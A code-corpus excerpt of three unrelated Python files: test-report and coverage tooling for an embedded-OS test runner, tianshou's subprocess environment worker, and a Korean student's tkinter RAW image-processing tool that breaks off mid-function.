instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and not instance.build_only:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
logger.error(f"Unknown status {instance.status}")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(instance.build_only and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (instance.build_only and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' \
or (instance.build_only and instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform, is_pty):
device = {
"serial": None,
"platform": platform,
"serial_pty": None,
"counter": 0,
"available": True,
"connected": True
}
if is_pty:
device['serial_pty'] = serial
else:
device['serial'] = serial
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
subproc.py | import gym
import time
import ctypes
import numpy as np
from collections import OrderedDict
from multiprocessing.context import Process
from multiprocessing import Array, Pipe, connection
from typing import Callable, Any, List, Tuple, Optional
from tianshou.env.worker import EnvWorker
from tianshou.env.utils import CloudpickleWrapper
def _worker(parent, p, env_fn_wrapper, obs_bufs=None):
def _encode_obs(obs, buffer):
if isinstance(obs, np.ndarray):
buffer.save(obs)
elif isinstance(obs, tuple):
for o, b in zip(obs, buffer):
_encode_obs(o, b)
elif isinstance(obs, dict):
for k in obs.keys():
_encode_obs(obs[k], buffer[k])
return None
parent.close()
env = env_fn_wrapper.data()
try:
while True:
try:
cmd, data = p.recv()
except EOFError: # the pipe has been closed
p.close()
break
if cmd == 'step':
obs, reward, done, info = env.step(data)
if obs_bufs is not None:
obs = _encode_obs(obs, obs_bufs)
p.send((obs, reward, done, info))
elif cmd == 'reset':
obs = env.reset()
if obs_bufs is not None:
obs = _encode_obs(obs, obs_bufs)
p.send(obs)
elif cmd == 'close':
p.send(env.close())
p.close()
break
elif cmd == 'render':
p.send(env.render(**data) if hasattr(env, 'render') else None)
elif cmd == 'seed':
p.send(env.seed(data) if hasattr(env, 'seed') else None)
elif cmd == 'getattr':
p.send(getattr(env, data) if hasattr(env, data) else None)
else:
p.close()
raise NotImplementedError
except KeyboardInterrupt:
p.close()
_NP_TO_CT = {
np.bool: ctypes.c_bool,
np.bool_: ctypes.c_bool,
np.uint8: ctypes.c_uint8,
np.uint16: ctypes.c_uint16,
np.uint32: ctypes.c_uint32,
np.uint64: ctypes.c_uint64,
np.int8: ctypes.c_int8,
np.int16: ctypes.c_int16,
np.int32: ctypes.c_int32,
np.int64: ctypes.c_int64,
np.float32: ctypes.c_float,
np.float64: ctypes.c_double,
}
class ShArray:
"""Wrapper of multiprocessing Array"""
def __init__(self, dtype, shape):
self.arr = Array(_NP_TO_CT[dtype.type], int(np.prod(shape)))
self.dtype = dtype
self.shape = shape
def save(self, ndarray):
assert isinstance(ndarray, np.ndarray)
dst = self.arr.get_obj()
dst_np = np.frombuffer(dst, dtype=self.dtype).reshape(self.shape)
np.copyto(dst_np, ndarray)
def get(self):
return np.frombuffer(self.arr.get_obj(),
dtype=self.dtype).reshape(self.shape)
def _setup_buf(space):
if isinstance(space, gym.spaces.Dict):
assert isinstance(space.spaces, OrderedDict)
buffer = {k: _setup_buf(v) for k, v in space.spaces.items()}
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(space.spaces, tuple)
buffer = tuple([_setup_buf(t) for t in space.spaces])
else:
buffer = ShArray(space.dtype, space.shape)
return buffer
class SubprocEnvWorker(EnvWorker):
"""Subprocess worker used in SubprocVectorEnv and ShmemVectorEnv."""
def __init__(self, env_fn: Callable[[], gym.Env],
share_memory=False) -> None:
super().__init__(env_fn)
self.parent_remote, self.child_remote = Pipe()
self.share_memory = share_memory
self.buffer = None
if self.share_memory:
dummy = env_fn()
obs_space = dummy.observation_space
dummy.close()
del dummy
self.buffer = _setup_buf(obs_space)
args = (self.parent_remote, self.child_remote,
CloudpickleWrapper(env_fn), self.buffer)
self.process = Process(target=_worker, args=args, daemon=True)
self.process.start()
self.child_remote.close()
def __getattr__(self, key: str):
self.parent_remote.send(['getattr', key])
return self.parent_remote.recv()
def _decode_obs(self, isNone):
def decode_obs(buffer):
if isinstance(buffer, ShArray):
return buffer.get()
elif isinstance(buffer, tuple):
return tuple([decode_obs(b) for b in buffer])
elif isinstance(buffer, dict):
return {k: decode_obs(v) for k, v in buffer.items()}
else:
raise NotImplementedError
return decode_obs(self.buffer)
def reset(self) -> Any:
self.parent_remote.send(['reset', None])
obs = self.parent_remote.recv()
if self.share_memory:
obs = self._decode_obs(obs)
return obs
@staticmethod
def wait(workers: List['SubprocEnvWorker'],
wait_num: int,
timeout: Optional[float] = None) -> List['SubprocEnvWorker']:
conns, ready_conns = [x.parent_remote for x in workers], []
remain_conns = conns
t1 = time.time()
while len(remain_conns) > 0 and len(ready_conns) < wait_num:
if timeout:
remain_time = timeout - (time.time() - t1)
if remain_time <= 0:
break
else:
remain_time = timeout
remain_conns = [conn for conn in remain_conns
if conn not in ready_conns]
new_ready_conns = connection.wait(
remain_conns, timeout=remain_time)
ready_conns.extend(new_ready_conns)
return [workers[conns.index(con)] for con in ready_conns]
def send_action(self, action: np.ndarray) -> None:
self.parent_remote.send(['step', action])
def get_result(self) -> Tuple[
np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
obs, rew, done, info = self.parent_remote.recv()
if self.share_memory:
obs = self._decode_obs(obs)
return obs, rew, done, info
def seed(self, seed: Optional[int] = None) -> List[int]:
self.parent_remote.send(['seed', seed])
return self.parent_remote.recv()
def render(self, **kwargs) -> Any:
self.parent_remote.send(['render', kwargs])
return self.parent_remote.recv()
def close_env(self) -> None:
try:
self.parent_remote.send(['close', None])
# mp may be deleted so it may raise AttributeError
self.parent_remote.recv()
self.process.join()
except (BrokenPipeError, EOFError, AttributeError):
pass
# ensure the subproc is terminated
self.process.terminate()
|
Project1 Image Processing Raw.py | ################################### - 권장1 : GrayScale 영상 처리 및 데이터 분석 툴 제작 ##################################
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
import operator
import threading
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
def display() : #Thread를 활용한 display() 함수
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
window.geometry(str(outH) + 'x' + str(outW))
canvas = Canvas(window, width=outW, height=outH)
paper = PhotoImage(width=outW, height=outH)
canvas.create_image((outW/2, outH/2), image=paper, state='normal')
# 화면에 출력
def putPixel() :
for i in range(0, outH) :
for k in range(0, outW) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data), (k,i))
threading.Thread(target=putPixel).start() #Thread를 활용한 display() 함수
canvas.pack()
#
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
#[화소점처리 알고리즘]
def addImage(num) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW
outH = inH
outImage = []
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
if num == 1: #밝게하기(덧셈)
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 : # 덧셈
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
elif num == 2: #어둡게하기(뺄셈)
value = askinteger('어둡게하기', '어둡게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] - value < 0: # 뺄셈
outImage[i][k] = 0
else:
outImage[i][k] = inImage[i][k] - value
elif num == 3: #밝게하기(곱셈)=뚜렷하게
value = askinteger('밝게하기(뚜렷하게)', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] * value > 255: # 곱셈
outImage[i][k] = 255
else:
outImage[i][k] = inImage[i][k] * value
elif num == 4: #어둡게하기(나눗셈)=희미하게
value = askinteger('어둡게하기(희미하게)', '어둡게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] // value > 255: # 나눗셈 : {조심} 몫만 출력 if not 에러.
outImage[i][k] = 255
elif inImage[i][k] // value < 0:
outImage[i][k] = 0
else:
outImage[i][k] = inImage[i][k] // value
elif num == 5: # AND연산
pass
elif num == 6: # OR연산
pass
elif num == 7: # XOR연산
pass
elif num == 8: # 반전
pass
elif num == 9: # 감마
pass
elif num == 10: # 파라볼라(Cap)
pass
elif num == 11: # 파라볼라(Cup)
pass
elif num == 12: # 이진화
pass
elif num == 13: # 범위강조
pass
display()
#[데이터분석]
def analyzeData(num) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
if num == 1 : # 입출력 영상의 평균값
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg))
label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg))
label2.pack()
elif num == 2 : #입출력 시 최대값, 최소값
inDict, outDict = {}, {}
for i in range(inH): #{중요}{다시보기}
for k in range(inW):
if inImage[i][k] in inDict:
inDict[inImage[i][k]] += 1
else:
inDict[inImage[i][k]] = 1
if outImage[i][k] in outDict:
outDict[outImage[i][k]] += 1
else:
outDict[outImage[i][k]] = 1
insortList = sorted(inDict.items(), key=operator.itemgetter(1))
outsortList = sorted(outDict.items(), key=operator.itemgetter(1))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('200x100')
label1 = Label(subWindow, text="입력 시 최대값, 최소값 : " + str(insortList[-1]) + str(insortList[0]))
label1.pack()
label2 = Label(subWindow, text="출력 시 최대값, 최소값 : " + str(outsortList[-1]) + str(outsortList[0]))
label2.pack()
subWindow.mainloop()
#[기하학 처리]
def upDown() : # 상하 반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[outW-1-i][k] = inImage[i][k] #{핵심}outH-K : 맨 뒤. #outH-1-K :0~255
display()
def LRReversalImage():# 좌우반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][outH - 1 - k] = inImage[i][k] #{핵심} #좌우 반전
display()
#화면 이동 알고리즘
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k] #Q)?
panYN = False
display()
def zoomOut() : # 축소하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k] #{핵심} 나누기
display()
def zoomInForW() : #화면확대-전방향
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('화면확대-전방향', '화면확대(전방향)할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW*scale); outH = int(inH*scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i * scale)][int(k * scale)] = inImage[i][k] # {핵심} 곱하기
display()
def zoomInBackW(): #화면확대-역방향-이웃 화소 보간법
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
